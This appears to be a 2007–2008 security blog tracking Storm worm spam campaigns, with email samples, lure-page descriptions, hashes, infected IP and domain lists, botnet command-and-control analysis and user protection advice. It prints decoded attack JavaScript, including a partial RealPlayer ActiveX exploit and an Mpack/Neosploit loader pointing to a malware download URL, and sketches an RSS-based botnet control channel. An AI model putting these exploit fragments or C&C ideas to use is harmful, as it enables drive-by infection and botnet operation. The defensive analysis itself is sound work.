Storm - Fourth of July run

Stormworm (aka CME711/Peed/Peacomm), has recently modified their spam run to play on US Independence Day - July 4th.

The site offers fireworks.exe, and forces a binary download using some malicious javascript. Users should be cautioned to watch for pages that look similar to this:




Instead of the typical "you need to download the codec to play this video", the storm authors have decided to show some pretty colors on the screen, which may actually trick more users into downloading the malicious file. Hopefully many people in the US will be watching the real fireworks displays and this run will fizzle out.

An example email:

Received: from [133.230.190.105] (helo=ngr)
by izqfx with smtp (Exim 4.62 (FreeBSD))
id 1KEaiJ-0005Pc-6y; Fri, 4 Jul 2008 09:07:55 +0700
Message-ID: <486d8556.6010007@libertytax.com>
Date: Fri, 4 Jul 2008 09:05:10 +0700
From:
User-Agent: Thunderbird 2.0.0.6 (Windows/20070728)
MIME-Version: 1.0
Received: from [133.230.190.105] (helo=ngr)
by izqfx with smtp (Exim 4.62 (FreeBSD))
id 1KEaiJ-0005Pc-6y; Fri, 4 Jul 2008 09:07:55 +0700
Message-ID: <486d8556.6010007@libertytax.com>
Date: Fri, 4 Jul 2008 09:05:10 +0700
From:
User-Agent: Thunderbird 2.0.0.6 (Windows/20070728)
MIME-Version: 1.0
To: [redacted]
Subject: Celebrate the spirit of America
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit

Celebrations have already begun http://68[dot]72[dot]110[dot]46/

Subject: Celebrate the spirit of America
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit

Celebrations have already begun http://68[dot]72[dot]110[dot]46/

(. replaced with [dot] in the url for accidental click protection)

Fireworks.exe drops the peers list in C:\WINDOWS\msserv.config and the binary to C:\WINDOWS\msserv.exe. It also sets the NTP server to time.windows.com and time.nist.gov. If you use another time server, and suspect an infection - check HKLM/​System/​CurrentControlSet/​Services/​W32Time/​Parameters.

Additional information can be found at http://garwarner.blogspot.com/2008/07/storm-worm-salutes-our-nation-on-4th.html

CME711's latest SE Spam

The Stormworm operators have recently updated their spam and web content. The webpage (capture to the right) is shown in its entirety. Users are then given the opportunity to download and run a malicious file, beijing.exe.

For the last couple months the Storm domains have been less fastfluxy - they change every 60 seconds instead of with every request. Perhaps this is because they simply are too small, or perhaps its because too many people are hitting the DNS servers, causing a Denial of Service attack.

Regardless, we've spotted the following domains in use:

biztech-co.cn, ratedhot.cn, fconnorlaw.cn, pacoast.cn, cadeaux-avenue.cn, likenewvideos.com, tellicolakerealty.cn, activeware.cn, grupogaleria.cn and polkerdesign.cn.


Please update your IDS accordingly.

CME711 - April Fools

I'm a bit late posting this one - I've been working on some penetration testing projects and have been unable to monitor my honeypots.

For those who have not yet noticed:

(image captured by DISOG staff on 2008/03/31)

5 second refresh downloads funny.exe, image click downloads kickme.exe and click here link is foolsday.exe - all of which are the same file.


The email:

From: sauna@piraeusbank.co.yu
To: Me
Subject: Gotcha! April Fool!
Date: Mon, 31 Mar 2008
MIME-Version: 1.0
Content-Type: text/plain;
format=flowed;
charset="iso-8859-1";
reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 5.50.4807.1700
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4807.1700

Doh! April's Fool. hxxp://69[dot]237[dot]180[dot]107

(obscuring done to protect the click-happy)

Drops a file in C:\WINDOWS\ called aromis.exe

Jose Nazario caught this one early on - check out his blog here.


I ran a quick query on my honeypot and found the following IP's serving the malicious site:

12.227.199.128, 157.252.144.83, 12.180.197.108, 201.236.232.174, 122.27.202.155, 201.223.28.183, 201.221.253.101, 201.244.162.4, 195.210.193.131, 190.51.252.2, 190.20.204.27, 201.255.219.218, 201.250.17.202, 190.164.121.145, 12.52.237.174, 201.83.126.59, 200.94.236.26, 201.233.92.206, 190.18.184.125, 194.106.95.22, 190.74.93.29, 190.99.245.190, 201.21.230.245, 12.206.243.139, 125.25.186.158, 125.25.184.146, 124.179.81.214, 190.184.11.24, 24.9.162.81, 24.207.187.180, 24.17.32.118, 209.33.54.179, 24.128.211.65, 24.128.104.153, 24.205.232.114, 24.34.213.108, 24.107.238.132, 221.156.165.195, 203.170.120.109, 59.0.132.4, 58.148.79.162, 211.247.36.237, 221.127.42.208, 59.162.171.116, 60.50.177.152, 218.53.196.196, 220.174.64.208, 68.35.77.47, 67.67.70.158, 67.186.80.253, 65.42.229.61, 67.149.51.30, 64.118.1.21, 68.114.21.117, 66.177.6.37, 63.78.245.134, 68.184.58.72, 68.40.43.30, 67.169.119.102, 67.189.224.51, 68.39.43.90, 65.191.88.121, 64.30.104.120, 65.60.228.114, 65.32.52.189, 67.185.230.180, 65.79.220.132, 68.202.92.236, 68.202.117.9, 67.42.158.183, 64.175.44.163, 67.158.13.101, 60.53.249.16, 68.127.123.188, 69.154.218.209, 71.226.39.64, 69.144.160.49, 68.63.19.201, 71.239.243.175, 70.136.17.38, 69.231.229.151, 68.83.16.79, 69.140.233.125, 69.225.253.167, 69.211.140.58, 69.246.94.16, 70.92.29.202, 74.129.21.5, 70.238.127.143, 69.207.251.224, 72.8.101.213, 71.9.7.113, 70.227.199.237, 69.183.188.168, 70.237.145.26, 71.197.38.110, 68.50.219.36, 71.142.241.127, 69.42.3.50, 74.233.128.126, 70.127.87.220, 70.126.163.86, 70.15.184.87, 71.84.167.230, 70.127.141.133, 71.75.20.9, 69.228.202.232, 74.75.186.228, 71.115.3.254, 72.186.88.186, 70.55.64.54, 69.238.88.2, 75.32.162.49, 75.18.100.96, 75.35.30.89, 76.30.141.221, 98.202.86.206, 75.143.144.223, 76.125.185.59, 76.194.244.132, 98.200.190.127, 75.4.244.196, 76.115.75.239, 76.123.171.54, 76.124.142.87, 98.195.201.101, 76.114.139.114, 98.192.11.39, 76.26.11.182, 99.129.205.142, 76.227.155.39, 76.99.94.153, 98.212.18.73, 99.162.53.130, 99.171.119.45, 76.99.195.186, 76.84.211.214, 98.220.158.148, 76.178.7.202, 76.229.114.181, 76.29.166.146, 99.130.33.79, 99.147.177.92, 76.111.136.44, 82.232.24.247, 75.4.50.13, 87.96.165.131, 89.132.71.47, 81.56.175.146, 85.155.32.253, 88.235.196.103, 80.31.76.46, 86.12.37.214, 81.97.222.20

CME711 - Its a howl!

Storm/CME711 is back to a 'funny greeting card' page.


(Note the "copyright error" in the image)

• The file postcard.exe is offered by clicking on the image.
• The file ecard.exe is offered when waiting 5 seconds.
• The file e-card.exe is offered when clicking the 'click here' link.

Many people already watch for *card.exe with their IDS. I don't expect this to last long. Perhaps the next will be related to the anticipated U.S. Economic Stimulus Package --- or maybe Easter?

It appears this latest run drops the peers list to c:\windows\system32\diperto.ini.

A few MD5's for the binaries are:

11b9d46c4b3e2059361a9ca3d85ddf82
399c189575547593a5b1f0dcab23cf67
4291a354788c2e4100ff7286c03536e2
47336a1cc00f028abbd75fc44ac51b75
51730a17b5dbfb4d508ac9c6c9b3a574
73b17235901ecbb04ec5e1984df89b4d
76e8e63915ec5c44f62e1bbd91b47522
dea1a23e7561e0326edc0e1b487b07dd
e65359a96fb163553f4e5516ac150d1f
e68e331c3e4fd2c1e6a5eaa233cd8554

Welcome to my homepage - CME711's latest run.

While checking my Stormworm/CME711/Peed/Peacomm/Zhelatin honeypot I noticed a recent page in German - which was roughly translated to English using an online translation utility:

Patrick homepage
Hello everyone!
Welcome to my home page

Short about me:

I have thought a lot, and now decided that normal relations with the woman I am with is not acceptable.
I am gay. My new life has changed a lot. I found a friend. The new sensation was the top and I do not
remember when I last felt so well. With my friend I spent the whole day, but then our love came to an end.

Now, I have only the soul of pain and memories. And now I will again find someone that I like,
with whom I spend my time and have sex too. The photo is a half year old (link:/album/IMG9481.exe)

I am unable to retrieve the binary - it appears the CME711 author(s) are still tweaking the page. The boarder of the page is an image, p.jpg. As soon as they finish updating I will post more details and a screen shot.

I suppose this could be loosely linked to the ED spam everyone is seeing in their email.

Botnet Distributed Command and Control. (DC&C)

Over the past four years we've seen a large number of law enforcement, ISPs, and hobbyists get involved with botnet monitoring. A side effect of the increased interest is that botnet operators will go to great lengths to keep their botnets hidden. That includes encryption, hiding in plain sight, use of undocumented/new protocols and distributed control structures. As law enforcement arrests more offenders, we see more of them using TOR, or their own botnets to hide their true identity. While I personally don't feel it will ever be the super-bug theory that Paul Vixie and Gadi Evron imagine, it is a concern we need to be aware of.

The following post may help drive some botnet operators deeper underground, but the concepts are not new. In many cases these concepts are in use today. I presented on these topics a year ago at the 5th Botnet Task Force conference. For a year security researchers and law enforcement have had the chance to reflect on my presentation and develop mitigation.

Distributed Command and Control is simply a term we use to identify botnets where the operator has learned that directly controlling a large botnet is a big risk to himself and his network. Large scale botnets still exist today, however the operators are wisely breaking these networks up into many smaller networks - or using peer to peer communication. Since the networks are spread out, its harder to eliminate the threat of one attacker.

For example, if a botnet operator takes his 50,000 bots, and spreads them out into 10 networks, each net could have 5,000 drones. By spreading his network out, he mitigates some of the threat from rival operators, botnet hunters, ISPs, and law enforcement. Even if one controller node was taken offline, the botnet operator has 45,000 bots to retaliate with. In many circumstances this gives an operator the heads up he needs to update his 45,000 other bots and protect his empire.

As recent as two years ago, we've started seeing botnets using a pyramid structure, like the simplified image below.



A botnet operator is represented at the top of this flow chart. He communicates with a smaller botnet of only a couple dozen drones. Those drones then communicate with many larger botnets, who perform the stated action. This provides the botnet operator a layer of protection. Now the experienced researchers or law enforcement must find the smaller net, to identify the botnet operator. This is time consuming work, and with out the cooperation of ISP's, its hard work. Even if a controller node is found, it is much easier to snoop on a net with 5,000-10,000 drones than it is one with less than 100 drones.

This distributed structure also helps if the botnet operator wants to rent out or sale portions of his bot. One chunk can be used for spam, while another may perform better in Denial of service type activities.

Another example of distributed structure is the P2P scenario, where the botnet operator issues a command, which is passed to a number of supernodes, whom then pass it to the single peers.

Mapping peer to peer and other types of DC&C's are still possible. It was done with Stormworm and will continue to be done with future P2P botnets. I wont highlight how researchers are doing this mapping, simply because we need to weigh teaching public (including bad-guys) and keeping an ace up our sleeves. I'm hoping this post will spark many closed door conversations to help investigate other methods for tracking and identifying.

As part of the BTF presentation I gave, I wanted to outline additional C&C vectors that could be used. The idea that really caught my eye was based on hiding in plain site. Using protocols that are commonly used by millions of users every day. CME711 (Stormworm) has been easy to keep on top of, because of the mistakes they make in maintaining their DNS (fast flux), registering their domains and using UDP P2P traffic. Because of that UDP P2P traffic many large corporations have been immune - they disable UDP outbound.

The number of infected machines would increase dramatically if the used a connection model similar to Skype.

So back to hiding in plain sight - What would you say to a bot that received its commands over RSS? News readers use RSS to gather headlines and a few lines of news. Users are able to quickly choose articles that interest them, while ignoring those that do not. Millions of people subscribe to RSS feeds, and many of those feeds are of blogger or comment pages. Many news sites allow comments on their website, which can then be retrieved via RSS. Since RSS is simply http requests wrapped in a pretty new interface (XML) bots could easily parse this data to receive commands. An anonymous poster could post a command, and bots could be scheduled to pull the feed every 10-15 minutes. The request would look like legitimate RSS traffic and it would be hard to tell which visitors were bots and which were legitimate.

Using a form of encryption the botnet operator could even protect his botnet so others were unable to issue commands. High profile news and blogging sites might not be so helpful with requests to disable portions of their website because a botnet used it as a command and control vector. They might be more willing to assist law enforcement though, certainly more willing than some ISP's.

So how do users protect themselves, and the rest of the internet community?

First, users should use common sense. Don't click links in email or instant messenger! If the email contains a link, use the cut and paste function to visit URLs. If you're offered a picture or video in instant messenger, verify the sender sent the file and only then use your best judgment before proceeding.

Don't download untrusted software. Even if its recommended by your neighborhood computer genius (highschool student) - do research with an internet search engine. What do others say about it?

Don't surf as an administrator. Even if you do pick up a piece of malware, if you're logged in with limited privileges you will be less likely to install harmful malware.

Online banking should be done from a secure location. Do not access your bank account from hotspots like coffee shops or restaurants. Avoid doing so from work as well - remember in the United States you have no right to privacy on your corporate PC, which likely means your boss is watching where you surf. He or she might just be using a keystroke logger.

Never give your personal information on the internet. Your bank will not notify you of account problems via email - and in the event that changes over the next few years, bank pages are usually encrypted. Watch for "https://" at the beginning of your URL bar. Watch for the padlock icon on most browsers. If you're presented with an expired or self signed certificate, cancel the connection and notify the webmaster immediately.

Consider using a Sandboxer for programs that access the internet. SandboxIE is a great piece of software that will wrap around web browsers, email clients, instant messengers, just about any application that accesses the internet. It uses temporary user space to protect you from hostile code.

Don't consider "known" sites trusted. No site is ever trusted. Sites are compromised every day. Many times these compromises point to code that will attempt to compromise your PC.

If possible, disable Javascript for sites you casually visit. Using the NoScript Firefox plugin is an excellent idea for most users. This is becoming increasingly harder as poor coders are hired to develop websites.

Use firewalls at both the router and operating system level.

Turn your pc off when not in use. Even if your machine is infected, the damage it can do would be limited to the time you spend on your system. Most users are on their home computer for only a few hours a day.

Keep your Antivirus definitions and application patches up to date. Remember many third party applications will not update every month like your operating system. You should do this manually or work with the vendor to schedule updates.

Alternative operating systems are no excuse for poor security practices. Linux has malware, OSx has malware, BSD has malware. Keep your security hat on even if you don't run the targeted OS of the month.

Report suspected botnet activity and spam. CastleCops and Shadowserver have excellent resources available to help report malicious activity. DISOG staff always welcomes submissions via email (staff [-at-] disog.org).

CME711: Happy Valentines Day and Halifax phish

The CME711 gang has changed their tactics again. We've started seeing emails in our mail drops with pointers to nodes serving "withlove.exe" and "with_love.exe".

So far they have reverted back to sending IP's in the email body, which makes it easy for most spam filters to catch.

The website code looks the same as in previous runs, with false binaries in comments and the greeting:

Your download should begin shortly. If your download does not start
in 10-20 seconds, you can click hereto launch the download
and then press Run

The link is a javascript: document.write( unescape( '%3C%61%20%68%72%65%66%3D%22%77%69%74%68%5F%6C%6F%76%65%2E%65%78%65%22%3E%0D%0A' ) );

That javascript translates to withlove.exe -- Additionally there is an image of a pink heart on the page that links to with_love.exe. You may wish to update your snort signatures.

Additionally we're tracking a phish using stormworm fastflux nodes with the domain ibank-halifax.com.

CME711 Domains offline.

Steven Adair with Shadowserver is reporting that all the Stormworm domains have been marked NOT DELEGATED.

Randy V also performed some checks today and found the same thing. We're keeping a close eye on our honeypot to see if they change domains or if this is simply a smoke screen.

The authors were probably finished with the domains anyway, since its well passed the new year. The DISOG team is placing bets on the next rouse. I say adult rated material for February 14th (St. Valentines Day).

Domains that have been flagged and appear to be disabled:

i-halifax.com, i-barclays.com, newyearcards2008.com, happycards2008.com, uhavepostcard.com, merrychristmasdude.com, newyearwithlove.com, familypostcards2008.com, freshcards2008.com, hellosanta2008.com, happy2008toyou.com, happysantacards.com, hohoho2008.com, santawishes2008.com, santapcards.com, postcards-2008.com, parentscards.com

Bah, Storm.

I'd like to thank everyone who wrote in with the updates, CME711 is now using a Happy New Year theme. I would have posted earlier, but I promised the family a full day of Non-Digital happiness and it was truly a white Christmas.

Nothing sexy about this latest run, pretty crappy workmanship. It was an obvious after thought. It probably pissed off the botrunner that so many people were able to catch on to his Naughty Santa theme, so he produced a text only front page:

Happy New Year!

Your download should begin shortly. If your download does not start in approximately 15 seconds, you can (happy2008.exe) click here to launch the download and then press Run. Enjoy!

Hardly worth a post, except to exclaim how pathetic it looks. Certainly not the experience we've seen from these guys in exploits past. The domain was even registered December 23rd, such poor planning. Not an encoded javascript in sight. I wonder how much money these guys are paying their graphic designers. Certainly more than they're making. Even second rate script rats should think twice before getting in bed with these goons - they're too famous.

So, the domain? uhavepostcard.com. (also happycards2008.com)
Are the others still resolving? Yup.
Which binaries still work? stripshow.exe sony.exe happy2008.exe (update: happy-2008.exe)
Should the offenders be strung up by their toes and fed spoiled eggnog for 30 days? ;)

I sincerely hope that everyone else had a wonderful holiday, and for my New Years wish, I'd like a picture of the CME711 weenies drinking well expired eggnog. I'd also settle for another wonderful day with the family, as it was today.

Stormworm is back. - Have a Merry Christmas Dude, Mrs. Claus is kinky!

We just received a handful of these in our mail drops. Looks like the grinch still runs storm.

Received: from odv ([129.65.118.202])
by dxmbg (8.13.4/8.13.4) with SMTP id lBO3q3Xg061735;
Sun, 23 Dec 2007 19:52:03 -0800
Message-ID: <002601c845e0$2b459370$ca764181@odv>
From: jyothi@acc.aon.com
To: Nicholas
Subject: Santa Said, HO HO HO
Date: Sun, 23 Dec 2007 19:50:48 -0800
MIME-Version: 1.0
Content-Type: text/plain;
format=flowed;
charset="iso-8859-1";
reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2800.1106
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106

hey,

I know you hate these kind of emails but this one is different. This
will be the best 2 min you spend this holiday. hehe
http:// merry christmas dude . com/

Which plays a happy little Christmas tune, offers stripshow.exe and visits this Neosploit:
http:// merrychristmasdude .com/ cgi-bin/ in.cgi?p=100

In place of MerryChristmasDude you could use ltbrew, tibeam, etc.

JSDecode (See previous post) has no issues with this javascript, and cleans it up to show:

var script = document.createElement("script");

script.setAttribute("language", "JavaScript");
script.setAttribute("src", "?t=595022058&r=2792316769&h=965359931&n=2128949605&flag_i");

document.body.appendChild(script);

So we look at cgi-bin/in.cgi?t=595022058&r=2792316769&h=965359931&n=2128949605&flag_i...

It took two passes, but JSDecode did its job:

....snip...

function startANI()
var ifr = document.createElement("div");
document.body.appendChild(ifr);
ifr.innerHTML = 'iframe src="?o2&p=595022058&r=2792316769" height="1" width="1"'
      return 0;
}

if (startMDAC() || makeSlide() || startQuickTime() || startSuperBuddy() || startAudioFile() || startGOM() || startWVF() || startANI()) { }
setTimeout("window.location = 'http://www.google.com'", 5000);

...snip...

The ANI looks fun:

From:
Subject:
Date: Thu, 20 Dec 2007 08:57:57 -0800
MIME-Version: 1.0
Content-Type: multipart/related;
type="text/html";
boundary="----=_NextPart_000_0005_01C842E6.6AA3A540"
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2900.2180
This is a multi-part message in MIME format.
------=_NextPart_000_0005_01C842E6.6AA3A540
Content-Type: text/html;
charset="windows-1251"
Content-Transfer-Encoding: quoted-printable
Content-Location: http://testtest/index.html

------=_NextPart_000_0005_01C842E6.6AA3A540
Content-Type: application/octet-stream
Content-Transfer-Encoding: base64
Content-Location: http://testtest/1.dat
....
[BASE64 ENCODED FILE - infected: Exploit.Win32.MS05-002.Gen]

Once ran in the Sandbox, %windir%/disnisa.exe is the binary and %windir%/disnisa.config holds the peer list.

Same old storm, binary changes every few seconds, and someone's going to fall for it.

Complete binary analysis can be found at ASERT (Arbor Networks, Jose Nazario)

QuickTime and RealPlayer Exploits

We're seeing lots of reports about Quicktime and RealPlayer exploits in the wild. Other security vendors are privately reporting an excess of 300 sites infected with these exploits. Most of them are iframes pointing to encoded Javascript. Of course users may never even know they've been infected.

Here is a partial snip of one exploit in human readable form:

function RealExploit()
{
var user = navigator.userAgent.toLowerCase();
if(user.indexOf("msie 6")==-1&&user.indexOf("msie 7")==-1)
return;
if(user.indexOf("nt 5.")==-1)
return;
VulObject = "IER" + "PCtl.I" + "ERP" + "Ctl.1";
try
{
Real = new ActiveXObject(VulObject);
}catch(error)
{
return;
}
RealVersion = Real.PlayerProperty("PRODUCTVERSION");
Padding = "";
JmpOver = unescape("%75%06%74%04");
for(i=0;i<32*148;i++)
Padding += "S";
if(RealVersion.indexOf("6.0.14.") == -1)
{
if(navigator.userLanguage.toLowerCase() == "zh-cn")
ret = unescape("%7f%a5%60");
else if(navigator.userLanguage.toLowerCase() == "en-us")
ret = unescape("%4f%71%a4%60");
else
return;
}
else if(RealVersion == "6.0.14.544")
ret = unescape("%63%11%08%60");

.....
(removed some content)
.....

PayLoad = Padding + AdjESP + Shell;
while(PayLoad.length < 0x8000)
PayLoad += "copyleft";
Real.Import("c:\\Program Files\\NetMeeting\\TestSnd.wav", PayLoad,"", 0, 0);
}
RealExploit();

Many people forget to upgrade the their third party applications. Please remember to apply all security patches for those as frequently (or more so) than Windows updates.
In other news,

Storm (CME711) has been very quiet for about two weeks now. The websites are still listening, but not serving any content. I still expect something big for the Christmas/Hanukkah season.

A large number of readers have reported phishing sites since my last blog posting. I wouldn't be surprised to hear there are more victims with the online gift buying season in full swing.

Spam (especially adult oriented) appears to be on the rise, at least to our mail drops. In the last two hours we've received 86 enlargement offers - Perhaps someone is trying to tell me something? -- Maybe my wife is behind that campaign...

Happy Holidays!

New style, same old exploits

The witches and goblins of storm have not finished their Halloween wrath.

At about 1300 hrs, UTC on November 7th, the xor’d mpack javascript was replaced with an iframe:

http://removed.for.your.protection/cgi-bin/in.cgi?p=user1" height="0" width="0"

This iframe redirects you to some heavily layered javascript. After peeling back the layers, the finished product looks like this:

…snip…

function startMDAC() {
var t = new Array('{BD96C556-65A3-11D0-983A-00C04FC29E30}', '{BD96C556-65A3-11D0-983A-00C04FC29E36}', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}', '{0006F033-0000-0000-C000-000000000046}', '{0006F03A-0000-0000-C000-000000000046}', '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}', '{6414512B-B978-451D-A0D8-FCFDF33E833C}', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}', '{639F725F-1B2D-4831-A9FD-874847682010}', '{BA018599-1DB3-44f9-83B4-461454C84BF8}', '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}', null);
var v = new Array(null, null, null);
var i = 0;
var n = 0;
var ret = 0;
var urlRealExe = 'http://removed.for.your.protection/cgi-bin/in.cgi?u2_1_600_2_0_870665223_2792316769_2354152789';
}

…snip…

The link in the urlRealExe variable is formally known as file.php. It is a downloader which grabs sony.exe and connects to the network.

There has been no change in the social engineering vectors, but the attempts to hide their exploit in layered javascript is new and might confuse antivirus.

Update: The servers are now responding with 500 (Internal Server Errors) when trying to access the /cgi-bin/in.cgi file.

Update 2: The new filename is dancer.exe. The email body provided to me has the word 'plain' incorrectly spelled as plane.

Detecting CME711 (Storm)

For those of you just joining us...

The trojan known as CME711 by Mitre, or Peacomm, Peed, Storm, and Nuwar, infects machines using social engineering. A user will receive an email with a half dozen or less lines of text. The email suggests the user will receive a greeting card, free game, or music sharing software. Other social engineering spams attributed to Storm have been placed on blogs and webpages.

More often than not, unsuspecting users will click the link provided in these emails or blogs. For those who are unlucky enough to have not applied patches to their operating system or third party software, the authors of this trojan have left a special treat - a javascript ripped from the Mpack suit.

When an unpatched user visits an Mpack infected site, they are infected with a host of malware. No user interaction is required for infection.

For those who have applied all patches, the authors have created a professional looking webpage that may spark your interest and have you clicking links. Either way, the end result is an infection, and your PC is turned into a zombie for the Storm botnet.

The botnet communicates using the same peer to peer technology as many file sharing applications like Gnutella and EDonkey. Since it uses this technology, it is hard to determine where botnet commands originate or how many zombies are a part of this botnet. Due to the peer to peer structure, locating the person controlling this network is very difficult. Worse still, the commands issued by the botnet controller are encrypted. The network uses DNS Double FastFlux to keep researchers from shutting the malware distribution points. Over 40,000 unique IP addresses have been seen by DISOG in the last 6 months serving malicious code for Storm. The Storm botnet is truly a global pest.

Many people have written in and asked for quick ways to detect if they are infected with Storm. This is difficult because Storm uses rootkit technology, to add to the misery, the code morphs every 30 to 60 seconds. This means you are unlikely to infect yourself with the same piece of code twice.

I've tested a few of the freely available rootkit detectors, and have come up with this pattern for tests:

Install rootkit detector -> run test -> reboot -> run test again.

Sophos rootkit detector and gmer both detected the hidden files after reboot, but neither detected on the first test.

Many people are reluctant to install another piece of software and I can understand why, so I decided to test the current version of Storm's file hiding technology. What I found is that you're able to determine if you've been infected by creating one file, and then trying to list that file using the dos directory (dir) command. You are also able to do this from the GUI, however the results are a little less obvious.

For this test, click start->run and type "cmd" (without quotes). A Command Prompt window will appear. Next you will want to create a file called spooldr.test. Do so by typing 'copy con spooldr.test'. Nothing will appear to happen, you will just be pushed to a blank line below your copy con command. Type something random and press enter. Then press the F6 key. You will see ^Z and '1 file(s) copied.' then you will be returned to your command prompt (C:\Documents and Settings\whatever\>) again. What you've just done is created a file with whatever text you typed on the blank line, just like if you created a new file in notepad and saved it.

Type 'dir spooldr.test'. If you're able to see the file with the current date and time, you're not infected with this version of Storm. If you can't list this file, you're probably infected, and need to seek professional help for removal.

It is trivial for the Storm authors to change their tactics and use another pattern for hiding their files. (SEE UPDATE BELOW!) I will try to keep on top of any changes and post them here - for now this should work on most systems. I could have written a program to do this for you and I am sure someone else will. However I believe in education, and you just can't learn anything if someone does all the work for you.

My first test was to run the most recent version of Storm as a normal, unprivileged user. The bot did make contact with the Storm network, however the rootkit function did not work, and I was able to see the spooldr.cfg file, which contains the current list of peers assigned to my computer. Upon reboot the software did not restart, so my machine did not participate with the botnet any longer. Running the code as administrator was when it became dangerous. Security experts have long recommended using a non-privlidged account for normal operations and only logging in as administrator when absolutely necessary. As if you needed another reason, right?

UPDATE:

McAfee is reporting the filenames have changed from spooldr.* to noskrnl.*. They also reminded us that wincom.* was used towards the beginning of the year. Its doubtful they changed the name based on this blogpost. More likely it was just good timing. I just grabbed a new binary and its still using spooldr.* - to be safe, try all three files.

MP3 Pump and Dumps -- UPDATED

Private security lists are buzzing about the latest Storm (CME711) Pump and Dumps are coming as MP3 audio attachments. Our mail drops have not received any of these yet, because our mail servers drop those attachments.

I've removed that restriction and hope to capture some samples soon. I've heard a sample and was barely able to understand the audio, though it is in English. I do not have permission to share that sample, so I will not be posting it here.

If you have a sample you'd like to share with the other readers, please send it as a zip attachment to security at disog dot org and let us know if we can attribute it to you.


Thanks for the submissions!

From an anonymous administrator

From Brent Eads

Lets get this party 'krackin!

The storm update has finally come, with the most recent page offering the latest in peer to peer sharing technology.
The page advertises a p2p application called Krakin, which, among other things is said to be:

Easy to install, prevents tracking, has blogs and chat platforms, and video mail.

The download link points to krakin.exe, which is a p2p client - a p2p botnet client. The page isn't lacking the MPACK javascript either. I expect this page will stick around awhile. It looks very professional. I expect the blogger spam will pick up with this run.

0.0.0.0 - UPDATED.

Once again, CME711's domain resolvers are all pointing to 0.0.0.0 - which suggests another change is upon us.

What will it be this time? Baseball? My home team has just swept the Diamond Backs, and made it to the World Series. Congratulations to the Colorado Rockies! The last 22 games have been outstanding!

---

Update from Randy V:
They are back in full force. A nearly complete turn over of the active list from yesterday:

190.128.76.140 200.127.196.112 201.235.46.246 24.126.26.18 67.190.138.189 68.113.78.23 68.57.236.13 68.76.98.212 69.230.199.160 70.243.202.40 70.244.102.159 74.139.41.221 76.100.35.250 76.226.146.196 76.73.135.17 85.187.86.249 88.74.161.197

and the currently active list:

209.102.175.61 219.115.223.181 24.178.197.7 24.178.99.202 24.210.99.223 24.235.140.159 61.84.67.116 67.64.104.4 68.76.98.212 69.151.234.219 71.79.181.218 72.128.41.234 72.128.61.29 72.160.184.227 74.140.168.34 76.216.62.73 76.226.146.196 76.99.89.48 77.197.44.76 84.174.112.145 84.42.164.6 89.112.20.242 98.195.153.198 98.197.63.176

Only 201.235.46.246, 68.76.98.212 and 76.226.146.196 are in common. 76.226.146.196 is probably only a proxy.

Baseball does sound like a ripe target. There has not been a page change yet.

Update 2 (from Nicholas):
OpenDNS is null routing all CME711 domains. You can protect yourself from some of the effects of this trojan by changing your domain servers to 208.67.222.222 and 208.67.220.220. For more information visit the OpenDNS website.

Some more CME711/STORM IPs and other statistics

There have been a number of requests in mailing lists and privately for the latest Stormworm numbers. It seems people like statistics.

Since Oct 1st, 2007 we've identified 4,149 unique IP addresses participating with our honeypots, either p2p, in DDOS attacks, or spreading 'spa-m-alware' (mostly the later, since our smtp honeypot is setup to capture outgoing spam, and there is lots of it).

Additionally, our sensors have downloaded 7,202 Storm binaries, resulting in 4,661 uniquely hashed downloads since Oct 1st, 2007. A total of 43,897+ unique binaries have been captured to date.

The domains are slow to resolve again, some of them not responding at all. This is probably because the author is looking to spread the executable SuperLaugh.exe and working to change his sites. SuperLaugh will be spammed using the rouse 'a funny cat e-card.'

Lending an air of credibility to the scam SuperLaugh.com, which is a valid ecard site, also has a file called SuperLaugh.exe which is downloaded from http:// www.superlaugh.com/ icon/SuperLaugh.exe and has an MD5Sum of 571dd3cec20da6c70a3b62fa9f3637a8. Our anti-virus scanners say the legit file is harmless.

Malware Page:

Legit Page:

(The pages are both animations, the cat towards the front has a moving head, and both cats have cartoon balloons with scripted text)

In addition to the static html code, the authors are also attaching the Mpack xor'd javascript to the end of their pages. The javascript will attempt to exploit several old vulnerabilities within windows and third party software. It forces the download of file.php, a downloader.

It's still surprising to me how many ISP's are allowing these domains to resolve. The bad press coverage should be enough for the ISPs to start null routing those domains. We're still getting activity on the following domains:

ptowl.com tibeam.com kqfloat.com snbane.com yxbegan.com wxtaste.com eqcorn.com bnably.com ltbrew.com

We received an email from someone we suspect was trying to take over the Storm botnet. When we did not provide him with the requested information we believe he launched a JoeJob attack as described in the last blog entry.

We've seen researchers using TOR to capture binaries or communicate with the network, we see denial of service attacks on high profile IP's, probably related to researchers honeypots, and we suspect we've seen a few attempted take over attacks.

The authors don't appear to be letting up. The change in malware file names tells me they are getting greedy or preparing for something big.

As more black hats investigate the CME711 code, the network will become more vulnerable to takeover attacks. I hope these guys cut their losses and start breaking down the net soon. I would hate to see such a large botnet in the hands of some second rate script kiddy.

Stormworm - iframe hell.

This morning we started receiving dual language Storm worm Emails:

From: fuzzarnsjjvr@sdc-dsc.gc.ca
Date: Sep 28, 2007 7:12 AM
Subject: Don't forget to play a game today
To: me



Too many hot games to mention; get 1000 free games. http://68.77.xx.xx/

Смотри что о тебе пишут,ну ты и сука,смотрите все! вот адресс
http:// bl0cker.info/ suki .php?new=pidori

(Spaces and xx's added to protect from accidental clicks)

The Russian suki.php page doesn't yet resolve (404 error) however there is an index page and it has javascript iframes pointing to

http:// 58.65.239.66 /~lem0n/st/go.php?sid=1
http:// 58.65.239.66 /~lem0n/st/go.php?sid=2
http:// 58.65.239.66 /~lem0n/st/go.php?sid=3
http:// 58.65.239.66 /~lem0n/st/go.php?sid=4

